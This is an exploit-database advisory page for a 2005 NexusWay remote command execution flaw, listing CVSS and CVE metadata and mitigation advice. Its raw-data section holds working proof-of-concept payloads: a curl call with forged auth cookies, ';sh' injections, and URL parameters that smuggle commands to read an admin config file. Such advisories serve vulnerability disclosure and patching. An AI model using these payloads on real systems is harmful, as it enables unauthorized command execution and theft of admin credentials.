header-logo
Suggest Exploit
vendor:
NexusWay
by:
SecurityFocus
9.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: NexusWay
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: CVE-2005-3106
CPE: a:nexusway:nexusway
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0101/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0101/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2005

NexusWay is reportedly affected by multiple remote vulnerabilities

NexusWay is vulnerable to remote command execution. An attacker can send a specially crafted HTTP request to the vulnerable server, containing malicious commands, which will be executed with root privileges.

Mitigation:

Upgrade to the latest version of NexusWay.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13596/info

NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device.

All versions of NexusWay are considered vulnerable at the moment. 

# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;
client_ip1;client=0.0.0.0' https://www.example.com/index.cgi

ping ;sh
traceroute ;sh

https://www.example.com/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test

Navigation

Suggest Exploit

Services By CQR